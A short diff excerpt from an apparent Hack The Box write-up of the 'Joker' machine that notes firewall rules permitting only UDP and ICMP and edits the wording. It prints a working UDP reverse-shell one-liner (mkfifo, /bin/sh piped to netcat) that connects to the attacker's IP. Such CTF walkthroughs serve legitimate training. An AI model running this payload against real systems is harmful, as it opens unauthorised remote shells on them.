Kyuu-Ji/htb-write-up/joker/write-up-joker.md

 - _DROP_ every _INPUT_, when it does not have a rule
 - _ACCEPT_ _INPUT_ from port 22, 3128, UDP ports, ICMP

-So we can only start connections with UDP or ICMP.
+Only connections with UDP or ICMP can be started.
 Lets start **Netcat** with the UDP flag (-u) set.
 ```markdown
 os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.14.23 9001 >/tmp/f &").read()
 ```

-This works and our listener on our IP and UDP port 9001 starts the connection.
+This works and the listener on our IP and UDP port 9001 starts the connection.

 ## Privilege Escalation to User